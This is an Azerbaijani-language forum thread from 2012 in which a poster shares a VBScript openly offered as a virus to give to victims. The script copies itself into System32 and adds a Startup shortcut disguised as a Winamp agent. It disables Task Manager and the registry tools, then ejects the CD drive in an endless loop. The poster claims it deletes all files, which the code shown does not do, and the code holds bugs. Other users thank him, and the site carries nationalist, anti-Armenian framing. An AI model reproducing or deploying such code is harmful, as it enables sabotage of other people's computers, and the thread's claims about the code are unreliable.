Anti-armenia.ORG - Forumlar - PC-nin evini yıxan VBS virusu



Istifadəçi
    2012-07-26 11:12 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Kod:
Set fso = CreateObject ("Scripting.FileSystemObject")
Set File = fso.GetFile(WScript.ScriptFullName)
File.Copy ("c:\winxp\System32\Script.vbs")
Set Shell = WScript.CreateObject("WScript.Shell")
StartupPath = Shell.SpecialFolders("Startup")
Set MyShortcut = Shell.CreateShortcut(StartupPath & _
"\Winamp Agent.lnk")
MyShortcut.TargetPath = Shell.ExpandEnvironmentStrings("c:\winxp\System32\ Script.vbs")
MyShortcut.IconLocation = Shell.ExpandEnvironmentStrings("C:\Program Files\Winamp\winamp.exe")
MyShortcut.Save
fso.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\ CURR ENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
fso.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
fso.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explоrer\NoClose", 1, "REG_DWORD"
Set WMPlayer = CreateObject("WMPlayer.OCX.7")
do
WMPlayer.CdRomCollection.Item(0).Eject()
WScript.Sleep(200)
WMPlayer.CdRomCollection.Item(0).Eject()
loop
]

bunu .vbs uzantısı ilə save edirik
lamoş bunu açan kimi bu virus autorun-a save edilir
bu virus dayanmadan diskavodu açıb bağlayır
task manager-i söndürür, buna görə də virusu dayandırmaq mümkün deyil
reestr da söndürülür bunda görə də virusu autorundan silmək olmur
kompda bütün faylları silir

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2012-07-26 11:45 GMT                 

Taj-In



Banned
Mesaj Sayı : 180
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər bro!
"lamoş" deyəsən təzə sözdü? Yeni moda düşüb hə?

Anti-armenia.ORG
    

Istifadəçi
    2012-07-26 11:50 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Sitat
#10942 Taj-In :
Təşəkkürlər bro!
"lamoş" deyəsən təzə sözdü? Yeni moda düşüb hə?



buyur bro )

hə təzə dəbə gəlib

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2012-07-26 12:10 GMT                 

Worm Man



Gold
Mesaj Sayı : 159
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baku
Ölkə :
Məslək : Sərbəst
Yaş : 27
Mesaj :

Mövzunu Paylaş!


təşəkkür məndə vbs script həvəskaı idim bir vaxtlar bu virus kompun dədəsin yandırır amma fikir verdim yalnız winamplı komplarda işləyər düzdü,?

Live to die another day
Anti-armenia.ORG
    

Istifadəçi
    2012-07-26 12:22 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Sitat
#10944 cavid_m :
təşəkkür məndə vbs script həvəskaı idim bir vaxtlar bu virus kompun dədəsin yandırır amma fikir verdim yalnız winamplı komplarda işləyər düzdü,?


yeah
yarlıka inject olur

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2012-07-26 13:33 GMT                 

M4NY3T!K



Gold
Mesaj Sayı : 606
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Naxçıvan
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG